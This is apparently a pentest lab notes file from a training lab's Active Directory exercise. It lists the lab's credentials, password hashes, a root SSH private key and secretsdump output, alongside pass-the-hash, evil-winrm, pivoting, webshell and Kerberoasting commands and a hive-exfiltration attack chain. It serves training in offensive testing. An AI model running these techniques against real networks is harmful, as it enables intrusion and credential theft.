daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

loot.md (21491B)


      1 ---
      2 title: "Loot — Attacking Enterprise Networks (INLANEFREIGHT.LOCAL)"
      3 description: "Attacking Enterprise Networks lab re-entry notes, host evidence, credentials, attack chain, and cleanup ledger."
      4 category: pentest-workflow
      5 subcategory: "CPTS Attack Flow"
      6 order: 19
      7 tags: ["htb", "academy", "htb-academy-attacking-enterprise-networks", "cpts", "inlanefreight", "activedirectory", "loot", "credentials", "pentest-workflow"]
      8 tools: []
      9 difficulty: advanced
     10 updated: "2026-08-29"
     11 source: "vault:Pentest Attack Flow/loot.md"
     12 ---
     13 > [!warning]+ SENSITIVE — Live Credential Store
     14 > This file contains working credentials, hashes, private keys, and domain secrets for the INLANEFREIGHT.LOCAL lab environment. Do not commit it to any remote repository or share it outside the engagement. If the vault syncs anywhere, exclude this file.
     15 
     16 ---
     17 
     18 ## 1. Quick Re-Entry (If the Lab / Server Restarts)
     19 
     20 > [!important]+ The lab's **external IP changes on every spawn**. `10.129.203.111` was this instance's dmz01 external address — re-check the spawned target IP and substitute it below. Internal IPs (`172.16.8.0/23`) have been stable across restarts.
     21 
     22 ### 1.1 dmz01 (Linux pivot) — root
     23 
     24 ```bash
     25 # Preferred: root SSH key (key material in §4.1)
     26 chmod 600 dmz01_key
     27 ssh -i dmz01_key root@<DMZ01-EXTERNAL-IP>
     28 
     29 # Fallback: password
     30 ssh srvadm@<DMZ01-EXTERNAL-IP>      # password: ILFreightnixadm!
     31 
     32 # Re-establish the SOCKS pivot for all internal work
     33 ssh -N -f -D 127.0.0.1:8081 -i dmz01_key root@<DMZ01-EXTERNAL-IP>
     34 # /etc/proxychains.conf -> socks4 127.0.0.1 8081
     35 ```
     36 
     37 ### 1.2 ACADEMY-AEN-DEV01 (172.16.8.20) — local admin / SYSTEM
     38 
     39 ```bash
     40 # Pass-the-Hash as LOCAL Administrator (validated -> Pwn3d!)
     41 proxychains nxc smb 172.16.8.20 --local-auth -u administrator -H 0e20798f695ab0d04bc138b22344cea8
     42 
     43 # Evil-WinRM shell (WinRM service confirmed running on DEV01)
     44 proxychains evil-winrm -i 172.16.8.20 -u administrator -H 0e20798f695ab0d04bc138b22344cea8
     45 
     46 # Remote secrets re-dump (no need to re-touch reg save if hives were wiped)
     47 proxychains impacket-secretsdump 'ACADEMY-AEN-DEV01/administrator@172.16.8.20' -hashes :0e20798f695ab0d04bc138b22344cea8
     48 ```
     49 
     50 Other ways back onto DEV01 (all still valid unless remediated):
     51 
     52 1. **Webshells dropped in webroot:** `http://172.16.8.20/Portals/0/cmdasp.aspx` and `nt-webshell-rosepine.aspx` (run as `iis apppool\dotnetnukeapppool`, `SeImpersonatePrivilege` held → PrintSpoofer for SYSTEM).
     53 2. **DNN admin UI:** browse `http://172.16.8.20/Login?returnurl=%2fadmin` via Firefox-SOCKS, log in `Administrator:D0tn31Nuk3R0ck$$@123` → Settings → SQL Console → re-enable `xp_cmdshell` if it was reset.
     54 3. **Anonymous NFS:** from dmz01 — `mount -t nfs 172.16.8.20:/DEV01 /tmp/DEV01` (export `/DEV01 (everyone)`).
     55 
     56 ### 1.3 Domain authentication (INLANEFREIGHT.LOCAL)
     57 
     58 ```bash
     59 # hporter — validated domain user (Domain Users only, NOT admin anywhere yet)
     60 proxychains nxc smb 172.16.8.20 -u hporter -p 'Gr8hambino!'
     61 proxychains nxc smb 172.16.8.3  -u hporter -p 'Gr8hambino!'   # DC01
     62 ```
     63 
     64 ---
     65 
     66 ## 2. Hosts & Access Matrix
     67 
     68 | Host | IP(s) | Role | Current access | Path back in |
     69 |---|---|---|---|---|
     70 | `dmz01` | `10.129.203.111` (ext, per-instance) / `172.16.8.120` (int) | Linux dual-homed pivot (FTP/SSH/HTTP/8080) | **root** | SSH key `dmz01_key`; `srvadm:ILFreightnixadm!` |
     71 | `ACADEMY-AEN-DEV01` | `172.16.8.20` | Win Server 2019 (build 17763) — DNN CMS, MSSQL$SQLEXPRESS, NFS `/DEV01`, RDP, WinRM | **SYSTEM** + local admin | PTH local Administrator hash; evil-winrm; webshells; DNN admin UI; NFS |
     72 | `DC01` | `172.16.8.3` | Domain Controller, INLANEFREIGHT.LOCAL | Domain user (`hporter`) | credentialed enum only, so far |
     73 | `ACADEMY-AEN-MS01` | `172.16.8.50` | Windows, Tomcat 10 on 8080 | none | dead end (no mgr creds); revisit with looted creds |
     74 
     75 > [!info]+ SMB Signing Posture
     76 > - **DC01 (172.16.8.3):** `Message signing enabled and required` (SMB 3.1.1) → **no SMB relay to the DC**.
     77 > - **DEV01 (172.16.8.20):** `signing:False` per nxc → relay-able target if coercion comes into play later.
     78 
     79 ---
     80 
     81 ## 3. Credentials
     82 
     83 ### 3.1 Cleartext — validated
     84 
     85 | Account | Secret | Source | Validated against | Result |
     86 |---|---|---|---|---|
     87 | `srvadm` (dmz01 local) | `ILFreightnixadm!` | Web app exploit chain (Section 5) | SSH on dmz01 | ✅ works |
     88 | DNN CMS `Administrator` (SuperUser) | `D0tn31Nuk3R0ck$$@123` | `web.config` via anonymous NFS `/DEV01` | DNN admin UI | ✅ works |
     89 | `INLANEFREIGHT\hporter` | `Gr8hambino!` | LSA autologon `DefaultPassword` on DEV01 | `nxc smb 172.16.8.20` (domain auth) | ✅ works — **no** `(Pwn3d!)` → not local admin |
     90 
     91 ### 3.2 DEV01 Local SAM — NT hashes
     92 
     93 BootKey: `0xb3a720652a6fca7e31c1659e3d619944`
     94 
     95 ```text
     96 Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e20798f695ab0d04bc138b22344cea8:::
     97 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
     98 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
     99 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    100 mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:3bb874a52ce7b0d64ee2a82bbf3fe1cc:::
    101 ```
    102 
    103 - `Administrator` NT `0e20798f695ab0d04bc138b22344cea8` — **validated via PtH → `(Pwn3d!)`** on DEV01. Test reuse on MS01 / other hosts.
    104 - `mpalledorous` NT `3bb874a52ce7b0d64ee2a82bbf3fe1cc` — untested elsewhere; local account reuse is common.
    105 - `31d6cfe0d16ae931b73c59d7e0c089c0` = empty password (Guest/DefaultAccount/WDAGUtilityAccount) — no value.
    106 
    107 ### 3.3 Cached domain logon (DEV01)
    108 
    109 ```text
    110 INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#f7d7bba128ca183106b8a3b3de5924bc  (cached 2022-06-23)
    111 ```
    112 
    113 - `$DCC2$` (MSCash2) — **crackable offline** (`hashcat -m 2100`), **not** usable for pass-the-hash. Cleartext already recovered (`Gr8hambino!`), so cracking is redundant — kept for completeness.
    114 
    115 ### 3.4 Machine account — `INLANEFREIGHT\ACADEMY-AEN-DEV$`
    116 
    117 ```text
    118 NT:      94eb4954a1395f6c034de95596a118cc
    119 aes256:  c9e4d026cdef925d846fa71ae97d72fdd40ca3b4fa2c475be05793b287d07b94
    120 aes128:  2bef029fb39e844c38c620d23f47026b
    121 des:     ea6b978c19c213fb
    122 plain_password_hex: 2da3b935d9a04dcc3783174e2ac50fd9d0596045c5e41fee1c8be5c045e686b92673c6b4b4528cae76f481047fd657d6bf0c06dc8d7ccffd20259ac5efe767084c077cc1a7c926c816528111b33de3defcfdc55a7bf2ad7edfa9adae0a7f441bb5960bb7546719e0dac7ab83ea9314b7530c7f04ba930c7f32df8a08586202bd70eaf72f5f5b8dbff737c6495e32aba7aea8a9e9ab716eb2f16a2e6a109f1642d53079f71cd09c5e1d0863b0b68d3d950eff49793591a0cf18cc46153e15b7ff363f0333d4e70c557d9dbfdbbc761199a0825b2f1119b0fcf7205afa6899c12eb3d1ae04344fe39c91a69e8ac5345457
    123 ```
    124 
    125 > [!tip]+ Why the machine account matters
    126 > `ACADEMY-AEN-DEV$` is an authenticated domain principal: its NT hash/AES keys give AD recon (LDAP/Kerberos) **without any user credential**, and its SPNs (`HOST`, `TERMSRV`, `nfs`, `RestrictedKrbHost`) make **silver tickets against DEV01's own services** possible. Also the ticket to delegated/kerberos abuse if the box is ever re-roled.
    127 
    128 ### 3.5 MSSQL logins — `MSSQL$SQLEXPRESS` on DEV01
    129 
    130 Extracted via the DNN SQL console. `0x0200…` format = MSSQL 2012+ (SHA-512 salted) → **`hashcat -m 1731`** / John `mssql12`.
    131 
    132 ```text
    133 sa                                       0x020073803784a7bdf8be6d18c536b3ec32347e77a054735c72bb71b37a684a0a47b500a48027866aa787744531c45a5159a901bd56b31627e305ab47c55d5cbb8e218f0b3834
    134 ##MS_PolicyEventProcessingLogin##        0x020008071fa44df389f8dd4c1c9d1c927da31b30f8acbf73959bda3cc3cbda4bbdf5cf457d5da52e3ad99a162a34575596300ae91e1503c2eeec44e923be318e599a730132b6
    135 ##MS_PolicyTsqlExecutionLogin##          0x020023a603824646083129fc1ed2114d844b33307d9b53aef3bc6b1eb813e23c3ee252c3f454b4ebe6160838bd1328a093d41d37800e1a7e65387ac192c011d5afd79b6c80c3
    136 MyDNNUser                                0x0200b34cbf681c35bccd5eec868cca6e2fb47511bcc6ca9ce7966be88df5c5c58cad0188a829f5044e2faedc1fa59d5864cb93d8ec3fbd57aab23ca8af8ec5a4be09bf42a4bb
    137 ```
    138 
    139 Raw `sys.sql_logins.password_hash` varbinary as displayed (base64) by the DNN SQL console:
    140 
    141 ```text
    142 sa                                     AgBzgDeEp734vm0YxTaz7DI0fnegVHNccrtxs3poSgpHtQCkgCeGaqeHdEUxxFpRWakBvVazFifjBatHxV1cu44hjws4NA==
    143 ##MS_PolicyEventProcessingLogin##      AgAIBx+kTfOJ+N1MHJ0ckn2jGzD4rL9zlZvaPMPL2ku99c9FfV2lLjrZmhYqNFdVljAK6R4VA8Lu7ETpI74xjlmacwEytg==
    144 ##MS_PolicyTsqlExecutionLogin##        AgAjpgOCRkYIMSn8HtIRTYRLMzB9m1Ou87xrHrgT4jw+4lLD9FS06+YWCDi9Eyigk9QdN4AOGn5lOHrBksAR1a/Xm2yAww==
    145 MyDNNUser                              AgCzTL9oHDW8zV7shozKbi+0dRG8xsqc55Zr6I31xcWMrQGIqCn1BE4vrtwfpZ1YZMuT2Ow/vVeqsjyor47FpL4Jv0Kkuw==
    146 ```
    147 
    148 - Cracking priorities: **`sa`** (breaks DNN dependency — direct `mssqlclient.py` to DEV01:1433) and **`MyDNNUser`** (the DNN app's own DB login — likely in the `web.config` connection string too; worth grepping the mounted share again).
    149 - The two `##MS_Policy*##` logins are internal SQL Server policy accounts — skip.
    150 
    151 ---
    152 
    153 ## 4. Key Material
    154 
    155 ### 4.1 dmz01 root SSH private key (`dmz01_key`)
    156 
    157 Recovered from `/root/.ssh/id_rsa` via the GTFOBins `openssl` file-read primitive. `chmod 600` before use. Fingerprint comment: `root@ubuntu`.
    158 
    159 ```text
    160 -----BEGIN OPENSSH PRIVATE KEY-----
    161 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
    196 WNfJbbEPrmQf0AAAALcm9vdEB1YnVudHU=
    197 -----END OPENSSH PRIVATE KEY-----
    198 ```
    199 
    200 ### 4.2 DPAPI_SYSTEM (DEV01)
    201 
    202 ```text
    203 dpapi_machinekey: 0x6968d50f5ec2bc41bc207a35f0392b72bb083c22
    204 dpapi_userkey:    0xe1e7a8bc8273395552ae8e23529ad8740d82ea92
    205 ```
    206 
    207 Enables offline decryption of DPAPI masterkeys/credential blobs recovered from DEV01 (Wi-Fi, RDP saved creds, browser, scheduled-task creds).
    208 
    209 ### 4.3 NL$KM (DEV01)
    210 
    211 ```text
    212 NL$KM:210ce6ac8b089b3997ead9c677db10e62eb253437eb80664b3eb89b1dad122c71183fa35db573eb09d84594190187a8dedc91c26ffb7da6f02c92e189dca082d
    213 ```
    214 
    215 LSA secret-encryption key — needed only if re-parsing LSA secrets offline from a fresh `SECURITY` hive copy.
    216 
    217 ---
    218 
    219 ## 5. Domain Intelligence (INLANEFREIGHT.LOCAL)
    220 
    221 | Item | Value |
    222 |---|---|
    223 | Domain / FQDN | `INLANEFREIGHT` / `INLANEFREIGHT.LOCAL` |
    224 | Domain SID | `S-1-5-21-2814148634-3729814499-1637837074` |
    225 | DC | `DC01.INLANEFREIGHT.LOCAL` = `172.16.8.3` (DNS, Kerberos, LDAP/LDAPS, SMB signing **required**) |
    226 | Password policy | Min length **1**, history **none**, max age 42 days, **lockout threshold: Never** → spraying is safe in-lab; report as `Weak Password Policy` |
    227 | Known users | `hporter` (Domain Users only), `mpalledorous` (local DEV01), DNN `Administrator` |
    228 | Interesting groups | Tier 1–4 Admins, Secadmins, IT Admins, Server Admins, SQL Admins/Dev/QA, Website Admin, GPO Management, Exchange Administrator, Service Accounts, File Share Admin + F/G/H/J groups, **Protected Users** (blocks NTLM/delegation for members) |
    229 
    230 ### 5.1 Kerberoast targets (user accounts with SPNs)
    231 
    232 | Account | SPN | Priority |
    233 |---|---|---|
    234 | `azureconnect` | `adfsconnect/azure01.inlanefreight.local` | ★★★ AAD Connect sync — often replication rights |
    235 | `backupjob` | `backupjob/veam001.inlanefreight.local` | ★★★ Veeam backup service |
    236 | `mssqladm` | `MSSQLSvc/SQL-WEB01.inlanefreight.local:1433` | ★★★ name implies SQL admin |
    237 | `mssqlsvc` | `MSSQLSvc/DB01.inlanefreight.local:1433` | ★★ |
    238 | `svc_sql` | `MSSQLSvc/SQL01.inlanefreight.local:1433` | ★★ |
    239 | `sqlprod` | `MSSQLSvc/SQL02.inlanefreight.local:1433` | ★★ |
    240 | `sqldev` | `MSSQLSvc/SQL-DEV01.inlanefreight.local:1433` | ★★ |
    241 | `sqltest` | `MSSQLSvc/DEVTEST.inlanefreight.local:1433` | ★★ |
    242 | `sqlqa` | `MSSQLSvc/QA001.inlanefreight.local:1433` | ★★ |
    243 | `vmwarescvc` | `vmware/vc.inlanefreight.local` | ★★ vCenter |
    244 | `sapsso` / `sapvc` | `SAP/APP01`, `SAPsvc/SAP01.inlanefreight.local` | ★ SAP estate |
    245 
    246 ### 5.2 Infrastructure revealed by SPNs (resolve via DNS `172.16.8.3`)
    247 
    248 `DB01`, `SQL01`, `SQL02`, `SQL-DEV01`, `DEVTEST`, `QA001`, `SQL-WEB01`, `azure01`, `veam001`, `vc`, `APP01`, `SAP01` — none answered the `.8.0/23` ping sweep; likely on `.9.0/23` or deeper segments.
    249 
    250 ---
    251 
    252 ## 6. Scan Evidence Summary
    253 
    254 - **`smbScan-8-3.xml`** (nmap, 2026-08-27): DC01 `445/tcp` open, SMB 2.0.2→3.1.1, **signing enabled and required**.
    255 - **`8-20-2nd-pass-FurtherEnum.xml`** (nmap `-A --script vuln,nfs-*` against DEV01): ports `80/111/135/139/445` open; `http-enum` → `/login.aspx`, `/rss.aspx`, `/login/`, `/robots.txt`; `vuln` scripts all negative (no ms10-054/061, no web CVEs); NFS export `/DEV01` root listing: `BuildPackages.bat`, `CKEditorDefaultSettings.xml`, `CKToolbarButtons.xml`, `CKToolbarSets.xml`, `DNN/`, `WatchersNET.CKEditor.sln`, and **`flag.txt` (32 bytes)** — grab it if not already captured.
    256 - **`SNN-Admin-Creds.txt`**: DNN `web.config` excerpt — `<username>Administrator</username>` / `D0tn31Nuk3R0ck$$@123`; app targets .NET Framework 4.5.2, `debug="true"`.
    257 - **`DNN-SQL-Enum.txt`** (both copies identical): the SQL login hashes recorded in §3.5.
    258 - **`falseClusterUpgra.txt`**: SQL Server setup/discovery XML (SQL11/14/15 package install states) — installation metadata only, **no credentials**; reviewed and retained as evidence filler, not loot.
    259 
    260 ---
    261 
    262 ## 7. Attack Chain So Far
    263 
    264 1. **External web app exploit** → `srvadm:ILFreightnixadm!` → SSH into dmz01 (Section 5).
    265 2. **dmz01 privesc:** `sudo -l` → `NOPASSWD: /usr/bin/openssl` → GTFOBins file-read → `/root/.ssh/id_rsa` → **root persistence**.
    266 3. **Pivoting:** SSH `-D 8081` SOCKS (+ Metasploit `autoroute` via Meterpreter `shell.elf`) into `172.16.8.0/23`.
    267 4. **Discovery:** DC01 (`.3`), DEV01 (`.20` — DNN/NFS), MS01 (`.50` — Tomcat 10, dead end).
    268 5. **Pillaging:** anonymous NFS `/DEV01` → `web.config` → **DNN Administrator creds**.
    269 6. **DNN → RCE:** SuperUser login → SQL console → `sp_configure` + `xp_cmdshell` (as `nt service\mssql$sqlexpress`); separately, `.aspx` re-permitted in Allowable File Extensions → webshells in `C:\DotNetNuke\Portals\0` (as `iis apppool\dotnetnukeapppool`).
    270 7. **Privesc:** both contexts hold `SeImpersonatePrivilege`; `spoolsv.exe` running → **PrintSpoofer64 → `NT AUTHORITY\SYSTEM`** (nc64 callback caught on dmz01:443).
    271 8. **Secrets:** `reg save` SAM/SECURITY/SYSTEM → exfil via DNN file manager → `secretsdump.py LOCAL` → SAM hashes, `hporter` cached logon + LSA autologon `Gr8hambino!`, machine account keys, DPAPI_SYSTEM, NL$KM.
    272 9. **Validation:** local Administrator PtH → `(Pwn3d!)`; `hporter:Gr8hambino!` → valid domain auth (no admin).
    273 10. **SQL loot:** login hashes for `sa` / `MyDNNUser` pulled from `master` via the DNN SQL console.
    274 
    275 ---
    276 
    277 ## 8. Artefacts on Targets (Cleanup Log — remove/revert at closeout)
    278 
    279 **DEV01 (172.16.8.20)**
    280 - `C:\DotNetNuke\Portals\0\cmdasp.aspx`, `nt-webshell-rosepine.aspx`, `PrintSpoofer64.exe`, `nc64.exe`
    281 - `SAM.SAVE` / `SECURITY.SAVE` / `SYSTEM.SAVE` (verify deleted — exfil already complete)
    282 - DNN **Allowable File Extensions** — restore original list (remove `.aspx`/`.exe`/`.SAVE` additions)
    283 - MSSQL$SQLEXPRESS: `xp_cmdshell` + `show advanced options` re-enabled via `sp_configure` — **set back to 0**
    284 
    285 **dmz01**
    286 - `/tmp/shell.elf`, `/tmp/nmap` (static binary) + scan output files, `/tmp/DEV01` (NFS mount), `ilfreight_pcap`
    287 - No `authorized_keys` changes were made (existing root key reused) — nothing to revert there
    288 
    289 **Attacker host (~/Downloads)**
    290 - `nc64.exe`, `PrintSpoofer64.exe`, `SAM.SAVE`, `SECURITY.SAVE`, `SYSTEM.SAVE`, `users.txt`, `dmz01_key` — encrypt or shred at engagement close
    291 
    292 ---
    293 
    294 ## 9. Next Steps (Section 7 — Lateral Movement)
    295 
    296 1. **Kerberoast** with `hporter` — `proxychains GetUserSPNs.py 'INLANEFREIGHT.LOCAL/hporter:Gr8hambino!' -dc-ip 172.16.8.3 -request` → `hashcat -m 13100`. Priorities: `mssqladm`, `azureconnect`, `backupjob`.
    297 2. **Crack SQL hashes** (`-m 1731`): `sa` first → direct MSSQL access to DEV01 without DNN; check `MyDNNUser` reuse.
    298 3. **Hash reuse sweep:** `mpalledorous` NT and local `Administrator` NT against MS01/DC01 and any new hosts — `proxychains nxc smb <targets> --local-auth -u administrator -H 0e20798f695ab0d04bc138b22344cea8`.
    299 4. **Credentialed domain enum** as `hporter`: full user list, group memberships (`nxc smb 172.16.8.3 -u hporter -p 'Gr8hambino!' --users --groups --shares`), BloodHound ingestor through the proxy.
    300 5. **LSASS on DEV01:** interactive `hporter` session exists (autologon) — with local admin, dump via evil-winrm + pypykatz/procdump for live domain material.
    301 6. **Grab `flag.txt`** from the `/DEV01` NFS export root (32 bytes, sits next to the `DNN/` folder).
    302 7. **Resolve SPN hostnames** (`nslookup <name> 172.16.8.3`) to map the deeper network before moving.
    303 
    304 ---
    305 
    306 ## Appendix A — Full `secretsdump.py` Output (DEV01 hives, 2026-08-28)
    307 
    308 ```text
    309 $ secretsdump.py LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE
    310 Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies
    311 
    312 [*] Target system bootKey: 0xb3a720652a6fca7e31c1659e3d619944
    313 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    314 Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e20798f695ab0d04bc138b22344cea8:::
    315 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    316 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    317 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    318 mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:3bb874a52ce7b0d64ee2a82bbf3fe1cc:::
    319 [*] Dumping cached domain logon information (domain/username:hash)
    320 INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#f7d7bba128ca183106b8a3b3de5924bc: (2022-06-23 04:59:45+00:00)
    321 [*] Dumping LSA Secrets
    322 [*] $MACHINE.ACC
    323 INLANEFREIGHT\ACADEMY-AEN-DEV$:aes256-cts-hmac-sha1-96:c9e4d026cdef925d846fa71ae97d72fdd40ca3b4fa2c475be05793b287d07b94
    324 INLANEFREIGHT\ACADEMY-AEN-DEV$:aes128-cts-hmac-sha1-96:2bef029fb39e844c38c620d23f47026b
    325 INLANEFREIGHT\ACADEMY-AEN-DEV$:des-cbc-md5:ea6b978c19c213fb
    326 INLANEFREIGHT\ACADEMY-AEN-DEV$:aad3b435b51404eeaad3b435b51404ee:94eb4954a1395f6c034de95596a118cc:::
    327 [*] DefaultPassword
    328 (Unknown User):Gr8hambino!
    329 [*] DPAPI_SYSTEM
    330 dpapi_machinekey:0x6968d50f5ec2bc41bc207a35f0392b72bb083c22
    331 dpapi_userkey:0xe1e7a8bc8273395552ae8e23529ad8740d82ea92
    332 [*] NL$KM
    333 NL$KM:210ce6ac8b089b3997ead9c677db10e62eb253437eb80664b3eb89b1dad122c71183fa35db573eb09d84594190187a8dedc91c26ffb7da6f02c92e189dca082d
    334 [*] Cleaning up...
    335 ```
    336 
    337 ## Appendix B — Validation Evidence
    338 
    339 ```text
    340 $ nxc smb 172.16.8.20 --local-auth -u administrator -H 0e20798f695ab0d04bc138b22344cea8
    341 SMB  172.16.8.20  445  ACADEMY-AEN-DEV01  [*] Windows 10 / Server 2019 Build 17763 x64 (signing:False)
    342 SMB  172.16.8.20  445  ACADEMY-AEN-DEV01  [+] ACADEMY-AEN-DEV01\administrator:0e20798f695ab0d04bc138b22344cea8 (Pwn3d!)
    343 
    344 $ nxc smb 172.16.8.20 -u users.txt -p Gr8hambino!
    345 SMB  172.16.8.20  445  ACADEMY-AEN-DEV01  [-] INLANEFREIGHT.LOCAL\:Gr8hambino! STATUS_LOGON_FAILURE
    346 SMB  172.16.8.20  445  ACADEMY-AEN-DEV01  [+] INLANEFREIGHT.LOCAL\hporter:Gr8hambino!
    347 
    348 (First failure line shows an empty username — a blank first line in `users.txt`; `mpalledorous` as a DOMAIN account remains untested — re-run cleanly.)
    349 ```